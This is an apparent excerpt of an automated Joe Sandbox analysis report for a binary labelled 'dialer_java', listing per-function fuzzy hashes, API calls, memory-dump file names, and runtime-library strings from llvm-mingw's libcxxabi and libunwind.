                                      • Opcode Fuzzy Hash: c7e31e28da302632c023a726f4a17732f91bf8205f05fac472730efd64aa863f
                                      • Instruction Fuzzy Hash: 5541F1B3B05B8582DA18CB0AE44576D7BA5EB58BC0F008631CF8D877A5DF39D492C304
                                      APIs
                                      Strings
                                      • starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
                                      • /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc$_assertstrlen
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
                                      • API String ID: 3012236610-3503049562
                                      • Opcode ID: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
                                      • Instruction ID: db593daddd2a6dc73853689055d36ab80a86cd0e366876f6e1fa09afddfcf59c
                                      • Opcode Fuzzy Hash: 01387742c7347a065d0d3fa100ad1a8c0eb405b46fc2f649a98275b690413a58
                                      • Instruction Fuzzy Hash: 0C411333716B8185EB11CB18E4457A83BA8EB04B91F164235DF9C5B7E1DF39E296C314
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: > typena$ame $template
                                      • API String ID: 471065373-2892875084
                                      • Opcode ID: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
                                      • Instruction ID: 997c7322b4345e5eb1e89388e0a3d79814d0cea4d7d9ab527034ac0afa654a27
                                      • Opcode Fuzzy Hash: 9e9012e4aaa5198cb7273f277177ca7dcf34f7861e77788661574f326ce0afe6
                                      • Instruction Fuzzy Hash: 05315EF3B06B8582DA299F1AE5852697B65FB98BD0F008531CF8D577A4EF38D592C300
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: &$sizeof..
                                      • API String ID: 471065373-1098962357
                                      • Opcode ID: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
                                      • Instruction ID: 2f9b3111cfb4298d42a80a580e40e350f71a5e230c47e9564dd6ddd2d8c0d518
                                      • Opcode Fuzzy Hash: adf8345375f33b976376b6f3066ba57d42a7cef233737129a130052d44d8b66c
                                      • Instruction Fuzzy Hash: 38316DB7A06B8682DB259F49F4843ADB7A1EB547C4F408531DB8E57795EF3DE0818301
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID: restric$ volatil
                                      • API String ID: 471065373-3617781792
                                      • Opcode ID: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction ID: 13f0120b8d0f7e153cea7db1bc62a8f1633d30df72c7be8ed8828c2fea5aa33e
                                      • Opcode Fuzzy Hash: 6f97b2bdcfadeecc99b906921db84679300aa3e2afda12722fcb0dde6b6c7a67
                                      • Instruction Fuzzy Hash: 5D4164B3B05B8582DA28CF49E4857697761EB94BC4F008431DB9E577A4EF3DE481C345
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflush
                                      • String ID: CCG $libunwind: __libunwind_seh_personality() LanguageHandler returned %d$libunwind: __libunwind_seh_personality() calling LanguageHandler %p(%p, %p, %p, %p)
                                      • API String ID: 497872470-3214979313
                                      • Opcode ID: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
                                      • Instruction ID: b42495901022e80a0be86a3397a54d90dbac77d32f7a66a9a590c57a49698972
                                      • Opcode Fuzzy Hash: 5331a38f71f5f04ee22fa3a2a17e78d251d856f83c24bee91c8b074b7409e614
                                      • Instruction Fuzzy Hash: 4B31B223F1864181EB109B2DE4063BD77A5FB85780F044036DE8EA77E5DE3ED4868395
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: _assert
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$basi$basic_string$starts_with(SV, "basic_")
                                      • API String ID: 1222420520-1046023109
                                      • Opcode ID: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction ID: 45a64119237c5711a2e94320893ddd6db761c6ce84c6cf11e1230f7856c09c02
                                      • Opcode Fuzzy Hash: 8a1932efec0281c9f68b659c12b67e82c76870f9f13c1bc956f51ccfae572d47
                                      • Instruction Fuzzy Hash: CEF0B4B7B06B5281E6648F0CE482B287BA0EB54B60F508230C52CA2AD0DE2F9192C305
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$freememcpy
                                      • String ID:
                                      • API String ID: 2038854750-0
                                      • Opcode ID: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
                                      • Instruction ID: 1a6049230c9ec4f51e64b13eb6d08504f780c75308245fbceeae09f3ba257277
                                      • Opcode Fuzzy Hash: a14b495c1d2ab2fb7fa7001a555ecdf9c52a2580ad9786f42b98ddf7beecf6c3
                                      • Instruction Fuzzy Hash: 5791DFA3B09A8582EF148B1AD5953786BA1EF59BC4F048431CF4D97399DF2DD1A2C306
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc$malloc
                                      • String ID:
                                      • API String ID: 454241450-0
                                      • Opcode ID: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
                                      • Instruction ID: 505d2339f1156b4b66336e73914fcd0f124f97517417a82a9aae8145dfcf2259
                                      • Opcode Fuzzy Hash: c0b732543a884f7b52177f9fd860a4d077764d15161aa00754840a6817184501
                                      • Instruction Fuzzy Hash: A971E173B06B8582EA258B1AE4857AC7B64EB58BC0F008131CF9D577A5DF3DE5928300
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: realloc
                                      • String ID:
                                      • API String ID: 471065373-0
                                      • Opcode ID: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
                                      • Instruction ID: 30e7f453b6cf7ebde9a2ca675e40b80aa614b3352a9c5b3e01e224947e0c9df1
                                      • Opcode Fuzzy Hash: 2f7d11eb0644d44da1dbadc0eedc91ed27022fc7bc0ddba03700444f196e75e1
                                      • Instruction Fuzzy Hash: 48719FA3B06B8582EA25DF4AE485369ABA5EB54BC0F008431CB9E57794EF3DE491C305
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$Last != First && "Calling back() on empty vector!"$std$struct
                                      • API String ID: 2803490479-3902771045
                                      • Opcode ID: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
                                      • Instruction ID: 4da6536b962a4e795c23a5ea8be121001e9738b790622d8a00a1fe88938e8348
                                      • Opcode Fuzzy Hash: dac1940aed7c4ebf5e6eaeff0607231698d0c583ff25a4c13798f383bb8af2b8
                                      • Instruction Fuzzy Hash: 3831D023B1AA8240EB568B1DD94A7B93A94AF04BC0F054131CF6C9B3D1EF3DE5D28319
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: Once$ExecuteInit
                                      • String ID: cannot create thread specific key for __cxa_get_globals()$cannot zero out thread value for __cxa_get_globals()$execute once failure in __cxa_get_globals_fast()
                                      • API String ID: 689400697-2130391284
                                      • Opcode ID: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
                                      • Instruction ID: 5f2f039c8e690c41d06f02b1a986e0b12f765731f479076a40bd6e0fbaa05b3a
                                      • Opcode Fuzzy Hash: 91adbefc2d04b81e052fcb574bb784da4279744b813a2942087cac727f191c56
                                      • Instruction Fuzzy Hash: 2D219667F2960381F648AB1DEC473B43A95BF95780F800535C90DE26A1DE3FA4D5874A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: +
                                      • API String ID: 39653677-2126386893
                                      • Opcode ID: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
                                      • Instruction ID: 37b93a9ddb6cf17e369ee1a27ff1aa1d5aa54e4021d620774f5874012eb79ea8
                                      • Opcode Fuzzy Hash: 034d9eeac7ed9f065a3bffca9e980f61809d116cd8220f59320f650e106faf8c
                                      • Instruction Fuzzy Hash: 7751D4A372C2828BE7348A2DE05177EBF90EB41754F044139DB9A97AD1CF2EE5808B05
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: strlen
                                      • String ID: +
                                      • API String ID: 39653677-2126386893
                                      • Opcode ID: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
                                      • Instruction ID: 84325c02c14129f6d84bf122a6e08befb943ab8302e1360ed43099ea849684d7
                                      • Opcode Fuzzy Hash: bd7113bcb185bcac57370222d55923cd67c9b6dee89d6d9374e4d696b49277c4
                                      • Instruction Fuzzy Hash: 8751A563B1C2C24BE7748A2DD05A77EBF90EB41794F044138DB9A97AC1DF2DE5818B06
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: CaptureContextgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_init_local(cursor=%p, context=%p)
                                      • API String ID: 2386080382-2955335536
                                      • Opcode ID: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
                                      • Instruction ID: 32784c8dabd587eb1e3ef824426f6a1f49fa14c0f655795e5a89229978bb557a
                                      • Opcode Fuzzy Hash: 88fb065359ffd1b41ab9e8c7e360d3eec1f5404c89570d5450073f280386e48f
                                      • Instruction Fuzzy Hash: 75611222918AD092F32A4B2CE5067F5B3B4FFA5355F046211DFD952261FF3AA6E6C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: memset$fputc
                                      • String ID: 0
                                      • API String ID: 2903701566-4108050209
                                      • Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
                                      • Instruction ID: 8be75e39e00ef4bbdb06f76519996d1a349adce6a3f5a63bb52c259a3448879c
                                      • Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
                                      • Instruction Fuzzy Hash: 0941C493F082C246F7754E2D914A3795ED1AB20744F045130CE6AF66C1DE3EE8818306
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd
                                      Similarity
                                      • API ID: fflushgetenv
                                      • String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
                                      • API String ID: 1137233558-2498214732
                                      • Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
                                      • Instruction ID: 4aaf0922d0ee44f170ec3dfa2f7cfe668fb512d38bbdf9887e34aa4fec876637
                                      • Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
                                      • Instruction Fuzzy Hash: 6A31A527B1964541EB109B1EE8463793B58ABAAFD4F140136CE8E637A0CE3ED486C305
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true
                                      • Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
